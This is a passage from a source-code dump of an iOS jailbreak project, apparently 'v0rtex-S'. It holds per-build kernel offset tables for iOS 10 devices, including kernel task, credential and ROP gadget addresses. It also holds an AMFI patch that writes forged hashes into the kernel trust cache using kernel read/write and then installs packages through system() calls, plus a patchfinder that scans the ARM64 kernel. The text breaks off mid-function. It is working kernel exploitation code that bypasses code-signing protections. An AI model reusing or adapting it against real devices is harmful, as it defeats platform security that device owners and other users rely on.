OFFSET_CHGPROCCNT =0xfffffff00739aab4; 648 | OFFSET_KAUTH_CRED_REF =0xfffffff007374e6c; 649 | OFFSET_IPC_PORT_ALLOC_SPECIAL =0xfffffff0070a60b4; 650 | OFFSET_IPC_KOBJECT_SET =0xfffffff0070b938c; 651 | OFFSET_IPC_PORT_MAKE_SEND =0xfffffff0070a5bd8; 652 | OFFSET_OSSERIALIZER_SERIALIZE =0xfffffff00744dc40; 653 | OFFSET_ROP_LDR_X0_X0_0x10 =0xfffffff00639ca84; 654 | OFFSET_ROOT_MOUNT_V_NODE =0xfffffff0075b40b0; 655 | } 656 | else if (strcmp(u.version, "Darwin Kernel Version 16.6.0: Mon Apr 17 17:33:35 PDT 2017; root:xnu-3789.60.24~24/RELEASE_ARM64_T7001") == 0) { 657 | OFFSET_ZONE_MAP =0xfffffff007558478; 658 | OFFSET_KERNEL_MAP =0xfffffff0075b4050; 659 | OFFSET_KERNEL_TASK =0xfffffff0075b4048; 660 | OFFSET_REALHOST =0xfffffff00753aba0; 661 | OFFSET_COPYIN =0xfffffff00718d474; 662 | OFFSET_COPYOUT =0xfffffff00718d668; 663 | OFFSET_CHGPROCCNT =0xfffffff00739acd8; 664 | OFFSET_KAUTH_CRED_REF =0xfffffff007375090; 665 | OFFSET_IPC_PORT_ALLOC_SPECIAL =0xfffffff0070a60b4; 666 | OFFSET_IPC_KOBJECT_SET =0xfffffff0070b938c; 667 | OFFSET_IPC_PORT_MAKE_SEND =0xfffffff0070a5bd8; 668 | OFFSET_OSSERIALIZER_SERIALIZE =0xfffffff00744de64; 669 | OFFSET_ROP_LDR_X0_X0_0x10 =0xfffffff0063a4a84; 670 | OFFSET_ROOT_MOUNT_V_NODE =0xfffffff0075b40b0; 671 | } 672 | else if (strcmp(u.version, "Darwin Kernel Version 16.7.0: Thu Jun 15 18:33:36 PDT 2017; root:xnu-3789.70.16~4/RELEASE_ARM64_T7000") == 0) { 673 | OFFSET_ZONE_MAP =0xfffffff007558478; 674 | OFFSET_KERNEL_MAP =0xfffffff0075b4050; 675 | OFFSET_KERNEL_TASK =0xfffffff0075b4048; 676 | OFFSET_REALHOST =0xfffffff00753aba0; 677 | OFFSET_COPYIN =0xfffffff00718d028; 678 | OFFSET_COPYOUT =0xfffffff00718d21c; 679 | OFFSET_CHGPROCCNT =0xfffffff00739aa04; 680 | OFFSET_KAUTH_CRED_REF =0xfffffff007374d90; 681 | OFFSET_IPC_PORT_ALLOC_SPECIAL =0xfffffff0070a60b4; 682 | OFFSET_IPC_KOBJECT_SET =0xfffffff0070b938c; 683 | OFFSET_IPC_PORT_MAKE_SEND =0xfffffff0070a5bd8; 684 | OFFSET_OSSERIALIZER_SERIALIZE =0xfffffff00744db90; 685 | OFFSET_ROP_LDR_X0_X0_0x10 =0xfffffff00639ca84; 686 | OFFSET_ROOT_MOUNT_V_NODE =0xfffffff0075b40b0; 687 | } 688 | else if (strcmp(u.version, "Darwin Kernel Version 16.7.0: Thu Jun 15 18:33:35 PDT 2017; root:xnu-3789.70.16~4/RELEASE_ARM64_T7001") == 0) { 689 | OFFSET_ZONE_MAP =0xfffffff007558478; 690 | OFFSET_KERNEL_MAP =0xfffffff0075b4050; 691 | OFFSET_KERNEL_TASK =0xfffffff0075b4048; 692 | OFFSET_REALHOST =0xfffffff00753aba0; 693 | OFFSET_COPYIN =0xfffffff00718d120; 694 | OFFSET_COPYOUT =0xfffffff00718d314; 695 | OFFSET_CHGPROCCNT =0xfffffff00739ac28; 696 | OFFSET_KAUTH_CRED_REF =0xfffffff007374fb4; 697 | OFFSET_IPC_PORT_ALLOC_SPECIAL =0xfffffff0070a60b4; 698 | OFFSET_IPC_KOBJECT_SET =0xfffffff0070b938c; 699 | OFFSET_IPC_PORT_MAKE_SEND =0xfffffff0070a5bd8; 700 | OFFSET_OSSERIALIZER_SERIALIZE =0xfffffff00744ddb4; 701 | OFFSET_ROP_LDR_X0_X0_0x10 =0xfffffff0063a4a84; 702 | OFFSET_ROOT_MOUNT_V_NODE =0xfffffff0075b40b0; 703 | } 704 | } 705 | 706 | else 707 | { 708 | LOG("Device not supported yet."); 709 | return FALSE; 710 | } 711 | 712 | return TRUE; 713 | } 714 | 715 | -------------------------------------------------------------------------------- /v0rtex-S/tar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/thisiswisy/v0rtex-injector/18a242c97ba0c4d45a553c78ef91cf9145e9e17e/v0rtex-S/tar -------------------------------------------------------------------------------- /v0rtex-S/the_super_fun_part/amfi.h: -------------------------------------------------------------------------------- 1 | int patch_amfi(task_t tfpzero, uint64_t kslide, BOOL isv0rtex, BOOL hastweaks); 2 | -------------------------------------------------------------------------------- /v0rtex-S/the_super_fun_part/amfi.m: -------------------------------------------------------------------------------- 1 | #include "libjb.h" 2 | #include "../kernel.h" 3 | #include 4 | #include "patchfinder64.h" 5 | #include 6 | #include 7 | #include 8 | #include 9 | #include 10 | #include 11 | 12 | task_t taskfp0; 13 | 14 | kern_return_t mach_vm_read_overwrite(vm_map_t target_task, mach_vm_address_t address, mach_vm_size_t size, mach_vm_address_t data, mach_vm_size_t *outsize); 15 | kern_return_t mach_vm_write(vm_map_t target_task, mach_vm_address_t address, vm_offset_t data, mach_msg_type_number_t dataCnt); 16 | kern_return_t mach_vm_allocate(vm_map_t target, mach_vm_address_t *address, mach_vm_size_t size, int flags); 17 | 18 | 19 | 20 | void kwrite32(uint64_t where, uint32_t what) { 21 | uint32_t _what = what; 22 | kwrite(where, &_what, sizeof(uint32_t)); 23 | } 24 | 25 | 26 | void kwrite64(uint64_t where, uint64_t what) { 27 | uint64_t _what = what; 28 | kwrite(where, &_what, sizeof(uint64_t)); 29 | } 30 | 31 | static uint64_t kalloc(vm_size_t size){ 32 | // printf("taskfp0: %d", taskfp0); 33 | mach_vm_address_t address = 0; 34 | mach_vm_allocate(taskfp0, (mach_vm_address_t *)&address, size, VM_FLAGS_ANYWHERE); 35 | return address; 36 | } 37 | 38 | int cp(const char *to, const char *from) 39 | { 40 | int fd_to, fd_from; 41 | char buf[4096]; 42 | ssize_t nread; 43 | int saved_errno; 44 | 45 | fd_from = open(from, O_RDONLY); 46 | if (fd_from < 0) 47 | return -1; 48 | 49 | fd_to = open(to, O_WRONLY | O_CREAT | O_EXCL, 0666); 50 | if (fd_to < 0) 51 | goto out_error; 52 | 53 | while (nread = read(fd_from, buf, sizeof buf), nread > 0) 54 | { 55 | char *out_ptr = buf; 56 | ssize_t nwritten; 57 | 58 | do { 59 | nwritten = write(fd_to, out_ptr, nread); 60 | 61 | if (nwritten >= 0) 62 | { 63 | nread -= nwritten; 64 | out_ptr += nwritten; 65 | } 66 | else if (errno != EINTR) 67 | { 68 | goto out_error; 69 | } 70 | } while (nread > 0); 71 | } 72 | 73 | if (nread == 0) 74 | { 75 | if (close(fd_to) < 0) 76 | { 77 | fd_to = -1; 78 | goto out_error; 79 | } 80 | close(fd_from); 81 | 82 | /* Success! */ 83 | return 0; 84 | } 85 | 86 | out_error: 87 | saved_errno = errno; 88 | 89 | close(fd_from); 90 | if (fd_to >= 0) 91 | close(fd_to); 92 | 93 | errno = saved_errno; 94 | return -1; 95 | } 96 | 97 | int patch_amfi(task_t tfpzero, uint64_t kslide, bool isv0rtex, bool hastweaks) { 98 | taskfp0 = tfpzero; 99 | //printf("taskfp0: %d", taskfp0); 100 | init_patchfinder(taskfp0, 0xfffffff007004000 + kslide, NULL); //start patchfinder 101 | uint64_t trust_chain = find_trustcache(); //find trust cache 102 | uint64_t amficache = find_amficache(); //find amficache 103 | printf("trust_chain = 0x%llx\n", trust_chain); 104 | printf("amficache = 0x%llx\n", amficache); 105 | struct trust_mem mem; 106 | mem.next = rk64(taskfp0, trust_chain); 107 | *(uint64_t *)&mem.uuid[0] = 0xabadbabeabadbabe; 108 | *(uint64_t *)&mem.uuid[8] = 0xabadbabeabadbabe; 109 | 110 | //USAGE: 111 | //call grab_hashes to trust a binary 112 | //EXAMPLE: grab_hashes("/usr/bin", kread, amficache, mem.next) 113 | 114 | //first amfi patch 115 | 116 | if (isv0rtex) { 117 | 118 | printf("v0rtex rv = %d, numhash = %d\n", grab_hashes("/v0rtex", kread, amficache, mem.next), numhash); //WHY ON EARTH THIS WASN'T HERE 119 | printf("bin rv = %d, numhash = %d\n", grab_hashes("/bin", kread, amficache, mem.next), numhash); 120 | printf("usr rv = %d, numhash = %d\n", grab_hashes("/usr", kread, amficache, mem.next), numhash); 121 | printf("sbin rv = %d, numhash = %d\n", grab_hashes("/sbin", kread, amficache, mem.next), numhash); 122 | printf("dpkg rv = %d, numhash = %d\n", grab_hashes("/.dpkg/dpkg", kread, amficache, mem.next), numhash); 123 | 124 | if (hastweaks) { 125 | NSArray *paths = NSSearchPathForDirectoriesInDomains(NSDocumentDirectory, NSUserDomainMask, YES); 126 | NSString *documentsDirectory = [paths objectAtIndex:0]; 127 | 128 | NSString *filePath = [NSString stringWithFormat:@"%@/%@", documentsDirectory,@"tweak.deb"]; 129 | if ([[NSFileManager defaultManager] fileExistsAtPath:filePath]) { 130 | NSString *firstcmd = [NSString stringWithFormat:@"dpkg -e %@ /v0rtex", filePath]; 131 | system([firstcmd UTF8String]); 132 | printf("postinst rv = %d, numhash = %d\n", grab_hashes("/v0rtex", kread, amficache, mem.next), numhash); 133 | } 134 | } 135 | 136 | } 137 | //second amfi patch 138 | else { 139 | /* printf("usrbin rv = %d, numhash = %d\n", grab_hashes("/usr/bin", kread, amficache, mem.next), numhash); 140 | printf("localbin rv = %d, numhash = %d\n", grab_hashes("/usr/local/bin", kread, amficache, mem.next), numhash); 141 | printf("bin rv = %d, numhash = %d\n", grab_hashes("/bin", kread, amficache, mem.next), numhash); 142 | printf("sbin rv = %d, numhash = %d\n", grab_hashes("/sbin", kread, amficache, mem.next), numhash); 143 | printf("Apps rv = %d, numhash = %d\n", grab_hashes("/Applications", kread, amficache, mem.next), numhash); 144 | printf("usrlib rv = %d, numhash = %d\n", grab_hashes("/usr/lib", kread, amficache, mem.next), numhash); 145 | printf("usrlibexec rv = %d, numhash = %d\n", grab_hashes("/usr/libexec", kread, amficache, mem.next), numhash); 146 | printf("substratelib rv = %d, numhash = %d\n", grab_hashes("/Library/Frameworks/CydiaSubstrate.framework", kread, amficache, mem.next), numhash); 147 | printf("dylibs rv = %d, numhash = %d\n", grab_hashes("/Library/MobileSubstrate", kread, amficache, mem.next), numhash);*/ 148 | printf("usr rv = %d, numhash = %d\n", grab_hashes("/usr", kread, amficache, mem.next), numhash); 149 | printf("bin rv = %d, numhash = %d\n", grab_hashes("/bin", kread, amficache, mem.next), numhash); 150 | printf("sbin rv = %d, numhash = %d\n", grab_hashes("/sbin", kread, amficache, mem.next), numhash); 151 | printf("Apps rv = %d, numhash = %d\n", grab_hashes("/Applications", kread, amficache, mem.next), numhash); 152 | printf("Library rv = %d, numhash = %d\n", grab_hashes("/Library", kread, amficache, mem.next), numhash); 153 | 154 | // printf("dylibs rv = %d, numhash = %d\n", grab_hashes("/Library/MobileSubstrate", kread, amficache, mem.next), numhash); 155 | 156 | 157 | } 158 | 159 | size_t length = (sizeof(mem) + numhash * 20 + 0xFFFF) & ~0xFFFF; 160 | uint64_t kernel_trust = kalloc(length); 161 | printf("alloced: 0x%zx => 0x%llx\n", length, kernel_trust); 162 | 163 | mem.count = numhash; 164 | kwrite(kernel_trust, &mem, sizeof(mem)); 165 | kwrite(kernel_trust + sizeof(mem), allhash, numhash * 20); 166 | kwrite64(trust_chain, kernel_trust); 167 | 168 | if (hastweaks && !isv0rtex) { 169 | system("/usr/libexec/cydia/firmware.sh"); 170 | 171 | NSArray *paths = NSSearchPathForDirectoriesInDomains(NSDocumentDirectory, NSUserDomainMask, YES); 172 | NSString *documentsDirectory = [paths objectAtIndex:0]; 173 | 174 | NSString *filePath = [NSString stringWithFormat:@"%@/%@", documentsDirectory,@"tweak.deb"]; 175 | if ([[NSFileManager defaultManager] fileExistsAtPath:filePath]) { 176 | NSLog(@"\npath = %@ \n", filePath); 177 | NSString *secondcmd = [NSString stringWithFormat:@"dpkg --ignore-depends preferenceloader -i %@", filePath]; 178 | system([secondcmd UTF8String]); //install 179 | sleep(2); 180 | [[NSFileManager defaultManager] removeItemAtPath:filePath error:nil]; //clean up 181 | } 182 | } 183 | 184 | if (!isv0rtex) { 185 | free(allhash); 186 | free(allkern); 187 | free(amfitab); 188 | } 189 | //this is the old code 190 | //char *tt = "echo 'dlopen(\"/Library/MobileSubstrate/MobileSubstrate.dylib\", RTLD_LAZY)'| cycript -p SpringBoard"; 191 | //printf("\n THIS CYC: %s \n", tt); 192 | //system(tt); 193 | //system("launchctl load /Library/LaunchDaemons/*"); 194 | 195 | return 0; 196 | } 197 | -------------------------------------------------------------------------------- /v0rtex-S/the_super_fun_part/libjb.a: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/thisiswisy/v0rtex-injector/18a242c97ba0c4d45a553c78ef91cf9145e9e17e/v0rtex-S/the_super_fun_part/libjb.a -------------------------------------------------------------------------------- /v0rtex-S/the_super_fun_part/libjb.h: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | 5 | #ifndef libjb_h_included 6 | #define libjb_h_included 7 | 8 | /* mount ********************************************************************/ 9 | 10 | struct hfs_mount_args { 11 | char *fspec; /* block special device to mount */ 12 | uid_t hfs_uid; /* uid that owns hfs files (standard HFS only) */ 13 | gid_t hfs_gid; /* gid that owns hfs files (standard HFS only) */ 14 | mode_t hfs_mask; /* mask to be applied for hfs perms (standard HFS only) */ 15 | u_int32_t hfs_encoding; /* encoding for this volume (standard HFS only) */ 16 | struct timezone hfs_timezone; /* user time zone info (standard HFS only) */ 17 | int flags; /* mounting flags, see below */ 18 | int journal_tbuffer_size; /* size in bytes of the journal transaction buffer */ 19 | int journal_flags; /* flags to pass to journal_open/create */ 20 | int journal_disable; /* don't use journaling (potentially dangerous) */ 21 | } args; 22 | 23 | /* libhfs *******************************************************************/ 24 | 25 | enum { 26 | kPermOtherExecute = 1 << 0, 27 | kPermOtherWrite = 1 << 1, 28 | kPermOtherRead = 1 << 2, 29 | kPermGroupExecute = 1 << 3, 30 | kPermGroupWrite = 1 << 4, 31 | kPermGroupRead = 1 << 5, 32 | kPermOwnerExecute = 1 << 6, 33 | kPermOwnerWrite = 1 << 7, 34 | kPermOwnerRead = 1 << 8, 35 | kPermMask = 0x1FF, 36 | kOwnerNotRoot = 1 << 9, 37 | kFileTypeUnknown = 0x0 << 16, 38 | kFileTypeFlat = 0x1 << 16, 39 | kFileTypeDirectory = 0x2 << 16, 40 | kFileTypeLink = 0x3 << 16, 41 | kFileTypeMask = 0x3 << 16 42 | }; 43 | 44 | typedef long CICell; 45 | 46 | extern char *gLoadAddr; /* buffer of size 32MB (max file size) */ 47 | 48 | CICell HFSOpen(const char *filename, long offset); 49 | long HFSReadFile(CICell ih, char *filePath, void *base, unsigned long offset, unsigned long length); 50 | long HFSGetDirEntry(CICell ih, char *dirPath, unsigned long *dirIndex, char **name, long *flags, long *time); 51 | void HFSClose(CICell); 52 | 53 | /* untar ********************************************************************/ 54 | 55 | /* untar 'a' to current directory. path is name of archive (informational) */ 56 | void untar(FILE *a, const char *path); 57 | 58 | /* launchctl ****************************************************************/ 59 | 60 | int launchctl_load_cmd(const char *filename, int do_load, int opt_force, int opt_write); 61 | 62 | /* hashes *******************************************************************/ 63 | 64 | struct trust_dsk { 65 | unsigned int version; 66 | unsigned char uuid[16]; 67 | unsigned int count; 68 | //unsigned char data[]; 69 | } __attribute__((packed)); 70 | 71 | struct trust_mem { 72 | uint64_t next; //struct trust_mem *next; 73 | unsigned char uuid[16]; 74 | unsigned int count; 75 | //unsigned char data[]; 76 | } __attribute__((packed)); 77 | 78 | struct hash_entry_t { 79 | uint16_t num; 80 | uint16_t start; 81 | } __attribute__((packed)); 82 | 83 | typedef uint8_t hash_t[20]; 84 | 85 | extern hash_t *allhash; 86 | extern unsigned numhash; 87 | extern struct hash_entry_t *amfitab; 88 | extern hash_t *allkern; 89 | 90 | /* can be called multiple times. kernel read func & amfi/top trust chain block are optional */ 91 | int grab_hashes(const char *root, size_t (*kread)(uint64_t, void *, size_t), uint64_t amfi, uint64_t top); 92 | 93 | #endif 94 | -------------------------------------------------------------------------------- /v0rtex-S/the_super_fun_part/patchfinder64.c: -------------------------------------------------------------------------------- 1 | // 2 | // patchfinder64.c 3 | // extra_recipe 4 | // 5 | // Created by xerub on 06/06/2017. 6 | // Copyright © 2017 xerub. All rights reserved. 7 | // 8 | 9 | #include 10 | #include 11 | #include 12 | #include "kernel.h" 13 | 14 | typedef unsigned long long addr_t; 15 | 16 | #define IS64(image) (*(uint8_t *)(image) & 1) 17 | 18 | #define MACHO(p) ((*(unsigned int *)(p) & ~1) == 0xfeedface) 19 | 20 | /* generic stuff *************************************************************/ 21 | 22 | #define UCHAR_MAX 255 23 | 24 | static unsigned char * 25 | boyermoore_horspool_memmem(const unsigned char* haystack, size_t hlen, 26 | const unsigned char* needle, size_t nlen) 27 | { 28 | size_t last, scan = 0; 29 | size_t bad_char_skip[UCHAR_MAX + 1]; /* Officially called: 30 | * bad character shift */ 31 | 32 | /* Sanity checks on the parameters */ 33 | if (nlen <= 0 || !haystack || !needle) 34 | return NULL; 35 | 36 | /* ---- Preprocess ---- */ 37 | /* Initialize the table to default value */ 38 | /* When a character is encountered that does not occur 39 | * in the needle, we can safely skip ahead for the whole 40 | * length of the needle. 41 | */ 42 | for (scan = 0; scan <= UCHAR_MAX; scan = scan + 1) 43 | bad_char_skip[scan] = nlen; 44 | 45 | /* C arrays have the first byte at [0], therefore: 46 | * [nlen - 1] is the last byte of the array. */ 47 | last = nlen - 1; 48 | 49 | /* Then populate it with the analysis of the needle */ 50 | for (scan = 0; scan < last; scan = scan + 1) 51 | bad_char_skip[needle[scan]] = last - scan; 52 | 53 | /* ---- Do the matching ---- */ 54 | 55 | /* Search the haystack, while the needle can still be within it. */ 56 | while (hlen >= nlen) 57 | { 58 | /* scan from the end of the needle */ 59 | for (scan = last; haystack[scan] == needle[scan]; scan = scan - 1) 60 | if (scan == 0) /* If the first byte matches, we've found it. */ 61 | return (void *)haystack; 62 | 63 | /* otherwise, we need to skip some bytes and start again. 64 | Note that here we are getting the skip value based on the last byte 65 | of needle, no matter where we didn't match. So if needle is: "abcd" 66 | then we are skipping based on 'd' and that value will be 4, and 67 | for "abcdd" we again skip on 'd' but the value will be only 1. 68 | The alternative of pretending that the mismatched character was 69 | the last character is slower in the normal case (E.g. finding 70 | "abcd" in "...azcd..." gives 4 by using 'd' but only 71 | 4-2==2 using 'z'. */ 72 | hlen -= bad_char_skip[haystack[last]]; 73 | haystack += bad_char_skip[haystack[last]]; 74 | } 75 | 76 | return NULL; 77 | } 78 | 79 | /* disassembler **************************************************************/ 80 | 81 | static int HighestSetBit(int N, uint32_t imm) 82 | { 83 | int i; 84 | for (i = N - 1; i >= 0; i--) { 85 | if (imm & (1 << i)) { 86 | return i; 87 | } 88 | } 89 | return -1; 90 | } 91 | 92 | static uint64_t ZeroExtendOnes(unsigned M, unsigned N) // zero extend M ones to N width 93 | { 94 | (void)N; 95 | return ((uint64_t)1 << M) - 1; 96 | } 97 | 98 | static uint64_t RORZeroExtendOnes(unsigned M, unsigned N, unsigned R) 99 | { 100 | uint64_t val = ZeroExtendOnes(M, N); 101 | if (R == 0) { 102 | return val; 103 | } 104 | return ((val >> R) & (((uint64_t)1 << (N - R)) - 1)) | ((val & (((uint64_t)1 << R) - 1)) << (N - R)); 105 | } 106 | 107 | static uint64_t Replicate(uint64_t val, unsigned bits) 108 | { 109 | uint64_t ret = val; 110 | unsigned shift; 111 | for (shift = bits; shift < 64; shift += bits) { // XXX actually, it is either 32 or 64 112 | ret |= (val << shift); 113 | } 114 | return ret; 115 | } 116 | 117 | static int DecodeBitMasks(unsigned immN, unsigned imms, unsigned immr, int immediate, uint64_t *newval) 118 | { 119 | unsigned levels, S, R, esize; 120 | int len = HighestSetBit(7, (immN << 6) | (~imms & 0x3F)); 121 | if (len < 1) { 122 | return -1; 123 | } 124 | levels = ZeroExtendOnes(len, 6); 125 | if (immediate && (imms & levels) == levels) { 126 | return -1; 127 | } 128 | S = imms & levels; 129 | R = immr & levels; 130 | esize = 1 << len; 131 | *newval = Replicate(RORZeroExtendOnes(S + 1, esize, R), esize); 132 | return 0; 133 | } 134 | 135 | static int DecodeMov(uint32_t opcode, uint64_t total, int first, uint64_t *newval) 136 | { 137 | unsigned o = (opcode >> 29) & 3; 138 | unsigned k = (opcode >> 23) & 0x3F; 139 | unsigned rn, rd; 140 | uint64_t i; 141 | 142 | if (k == 0x24 && o == 1) { // MOV (bitmask imm) <=> ORR (immediate) 143 | unsigned s = (opcode >> 31) & 1; 144 | unsigned N = (opcode >> 22) & 1; 145 | if (s == 0 && N != 0) { 146 | return -1; 147 | } 148 | rn = (opcode >> 5) & 0x1F; 149 | if (rn == 31) { 150 | unsigned imms = (opcode >> 10) & 0x3F; 151 | unsigned immr = (opcode >> 16) & 0x3F; 152 | return DecodeBitMasks(N, imms, immr, 1, newval); 153 | } 154 | } else if (k == 0x25) { // MOVN/MOVZ/MOVK 155 | unsigned s = (opcode >> 31) & 1; 156 | unsigned h = (opcode >> 21) & 3; 157 | if (s == 0 && h > 1) { 158 | return -1; 159 | } 160 | i = (opcode >> 5) & 0xFFFF; 161 | h *= 16; 162 | i <<= h; 163 | if (o == 0) { // MOVN 164 | *newval = ~i; 165 | return 0; 166 | } else if (o == 2) { // MOVZ 167 | *newval = i; 168 | return 0; 169 | } else if (o == 3 && !first) { // MOVK 170 | *newval = (total & ~((uint64_t)0xFFFF << h)) | i; 171 | return 0; 172 | } 173 | } else if ((k | 1) == 0x23 && !first) { // ADD (immediate) 174 | unsigned h = (opcode >> 22) & 3; 175 | if (h > 1) { 176 | return -1; 177 | } 178 | rd = opcode & 0x1F; 179 | rn = (opcode >> 5) & 0x1F; 180 | if (rd != rn) { 181 | return -1; 182 | } 183 | i = (opcode >> 10) & 0xFFF; 184 | h *= 12; 185 | i <<= h; 186 | if (o & 2) { // SUB 187 | *newval = total - i; 188 | return 0; 189 | } else { // ADD 190 | *newval = total + i; 191 | return 0; 192 | } 193 | } 194 | 195 | return -1; 196 | } 197 | 198 | /* patchfinder ***************************************************************/ 199 | 200 | static addr_t 201 | step64(const uint8_t *buf, addr_t start, size_t length, uint32_t what, uint32_t mask) 202 | { 203 | addr_t end = start + length; 204 | while (start < end) { 205 | uint32_t x = *(uint32_t *)(buf + start); 206 | if ((x & mask) == what) { 207 | return start; 208 | } 209 | start += 4; 210 | } 211 | return 0; 212 | } 213 | 214 | static addr_t 215 | step64_back(const uint8_t *buf, addr_t start, size_t length, uint32_t what, uint32_t mask) 216 | { 217 | addr_t end = start - length; 218 | while (start >= end) { 219 | uint32_t x = *(uint32_t *)(buf + start); 220 | if ((x & mask) == what) { 221 | return start; 222 | } 223 | start -= 4; 224 | } 225 | return 0; 226 | } 227 | 228 | static addr_t 229 | bof64(const uint8_t *buf, addr_t start, addr_t where) 230 | { 231 | for (; where >= start; where -= 4) { 232 | uint32_t op = *(uint32_t *)(buf + where); 233 | if ((op & 0xFFC003FF) == 0x910003FD) { 234 | unsigned delta = (op >> 10) & 0xFFF; 235 | //printf("%x: ADD X29, SP, #0x%x\n", where, delta); 236 | if ((delta & 0xF) == 0) { 237 | addr_t prev = where - ((delta >> 4) + 1) * 4; 238 | uint32_t au = *(uint32_t *)(buf + prev); 239 | if ((au & 0xFFC003E0) == 0xA98003E0) { 240 | //printf("%x: STP x, y, [SP,#-imm]!\n", prev); 241 | return prev; 242 | } 243 | } 244 | } 245 | } 246 | return 0; 247 | } 248 | 249 | static addr_t 250 | xref64(const uint8_t *buf, addr_t start, addr_t end, addr_t what) 251 | { 252 | addr_t i; 253 | uint64_t value[32]; 254 | 255 | memset(value, 0, sizeof(value)); 256 | 257 | end &= ~3; 258 | for (i = start & ~3; i < end; i += 4) { 259 | uint32_t op = *(uint32_t *)(buf + i); 260 | unsigned reg = op & 0x1F; 261 | if ((op & 0x9F000000) == 0x90000000) { 262 | signed adr = ((op & 0x60000000) >> 18) | ((op & 0xFFFFE0) << 8); 263 | //printf("%llx: ADRP X%d, 0x%llx\n", i, reg, ((long long)adr << 1) + (i & ~0xFFF)); 264 | value[reg] = ((long long)adr << 1) + (i & ~0xFFF); 265 | /*} else if ((op & 0xFFE0FFE0) == 0xAA0003E0) { 266 | unsigned rd = op & 0x1F; 267 | unsigned rm = (op >> 16) & 0x1F; 268 | //printf("%llx: MOV X%d, X%d\n", i, rd, rm); 269 | value[rd] = value[rm];*/ 270 | } else if ((op & 0xFF000000) == 0x91000000) { 271 | unsigned rn = (op >> 5) & 0x1F; 272 | unsigned shift = (op >> 22) & 3; 273 | unsigned imm = (op >> 10) & 0xFFF; 274 | if (shift == 1) { 275 | imm <<= 12; 276 | } else { 277 | //assert(shift == 0); 278 | if (shift > 1) continue; 279 | } 280 | //printf("%llx: ADD X%d, X%d, 0x%x\n", i, reg, rn, imm); 281 | value[reg] = value[rn] + imm; 282 | } else if ((op & 0xF9C00000) == 0xF9400000) { 283 | unsigned rn = (op >> 5) & 0x1F; 284 | unsigned imm = ((op >> 10) & 0xFFF) << 3; 285 | //printf("%llx: LDR X%d, [X%d, 0x%x]\n", i, reg, rn, imm); 286 | if (!imm) continue; // XXX not counted as true xref 287 | value[reg] = value[rn] + imm; // XXX address, not actual value 288 | /*} else if ((op & 0xF9C00000) == 0xF9000000) { 289 | unsigned rn = (op >> 5) & 0x1F; 290 | unsigned imm = ((op >> 10) & 0xFFF) << 3; 291 | //printf("%llx: STR X%d, [X%d, 0x%x]\n", i, reg, rn, imm); 292 | if (!imm) continue; // XXX not counted as true xref 293 | value[rn] = value[rn] + imm; // XXX address, not actual value*/ 294 | } else if ((op & 0x9F000000) == 0x10000000) { 295 | signed adr = ((op & 0x60000000) >> 18) | ((op & 0xFFFFE0) << 8); 296 | //printf("%llx: ADR X%d, 0x%llx\n", i, reg, ((long long)adr >> 11) + i); 297 | value[reg] = ((long long)adr >> 11) + i; 298 | } else if ((op & 0xFF000000) == 0x58000000) { 299 | unsigned adr = (op & 0xFFFFE0) >> 3; 300 | //printf("%llx: LDR X%d, =0x%llx\n", i, reg, adr + i); 301 | value[reg] = adr + i; // XXX address, not actual value 302 | } 303 | if (value[reg] == what) { 304 | return i; 305 | } 306 | } 307 | return 0; 308 | } 309 | 310 | static addr_t 311 | calc64(const uint8_t *buf, addr_t start, addr_t end, int which) 312 | { 313 | addr_t i; 314 | uint64_t value[32]; 315 | 316 | memset(value, 0, sizeof(value)); 317 | 318 | end &= ~3; 319 | for (i = start & ~3; i < end; i += 4) { 320 | uint32_t op = *(uint32_t *)(buf + i); 321 | unsigned reg = op & 0x1F; 322 | if ((op & 0x9F000000) == 0x90000000) { 323 | signed adr = ((op & 0x60000000) >> 18) | ((op & 0xFFFFE0) << 8); 324 | //printf("%llx: ADRP X%d, 0x%llx\n", i, reg, ((long long)adr << 1) + (i & ~0xFFF)); 325 | value[reg] = ((long long)adr << 1) + (i & ~0xFFF); 326 | /*} else if ((op & 0xFFE0FFE0) == 0xAA0003E0) { 327 | unsigned rd = op & 0x1F; 328 | unsigned rm = (op >> 16) & 0x1F; 329 | //printf("%llx: MOV X%d, X%d\n", i, rd, rm); 330 | value[rd] = value[rm];*/ 331 | } else if ((op & 0xFF000000) == 0x91000000) { 332 | unsigned rn = (op >> 5) & 0x1F; 333 | unsigned shift = (op >> 22) & 3; 334 | unsigned imm = (op >> 10) & 0xFFF; 335 | if (shift == 1) { 336 | imm <<= 12; 337 | } else { 338 | //assert(shift == 0); 339 | if (shift > 1) continue; 340 | } 341 | //printf("%llx: ADD X%d, X%d, 0x%x\n", i, reg, rn, imm); 342 | value[reg] = value[rn] + imm; 343 | } else if ((op & 0xF9C00000) == 0xF9400000) { 344 | unsigned rn = (op >> 5) & 0x1F; 345 | unsigned imm = ((op >> 10) & 0xFFF) << 3; 346 | //printf("%llx: LDR X%d, [X%d, 0x%x]\n", i, reg, rn, imm); 347 | if (!imm) continue; // XXX not counted as true xref 348 | value[reg] = value[rn] + imm; // XXX address, not actual value 349 | } else if ((op & 0xF9C00000) == 0xF9000000) { 350 | unsigned rn = (op >> 5) & 0x1F; 351 | unsigned imm = ((op >> 10) & 0xFFF) << 3; 352 | //printf("%llx: STR X%d, [X%d, 0x%x]\n", i, reg, rn, imm); 353 | if (!imm) continue; // XXX not counted as true xref 354 | value[rn] = value[rn] + imm; // XXX address, not actual value 355 | } else if ((op & 0x9F000000) == 0x10000000) { 356 | signed adr = ((op & 0x60000000) >> 18) | ((op & 0xFFFFE0) << 8); 357 | //printf("%llx: ADR X%d, 0x%llx\n", i, reg, ((long long)adr >> 11) + i); 358 | value[reg] = ((long long)adr >> 11) + i; 359 | } else if ((op & 0xFF000000) == 0x58000000) { 360 | unsigned adr = (op & 0xFFFFE0) >> 3; 361 | //printf("%llx: LDR X%d, =0x%llx\n", i, reg, adr + i); 362 | value[reg] = adr + i; // XXX address, not actual value 363 | } 364 | } 365 | return value[which]; 366 | } 367 | 368 | static addr_t 369 | calc64mov(const uint8_t *buf, addr_t start, addr_t end, int which) 370 | { 371 | addr_t i; 372 | uint64_t value[32]; 373 | 374 | memset(value, 0, sizeof(value)); 375 | 376 | end &= ~3; 377 | for (i = start & ~3; i < end; i += 4) { 378 | uint32_t op = *(uint32_t *)(buf + i); 379 | unsigned reg = op & 0x1F; 380 | uint64_t newval; 381 | int rv = DecodeMov(op, value[reg], 0, &newval); 382 | if (rv == 0) { 383 | if (((op >> 31) & 1) == 0) { 384 | newval &= 0xFFFFFFFF; 385 | } 386 | 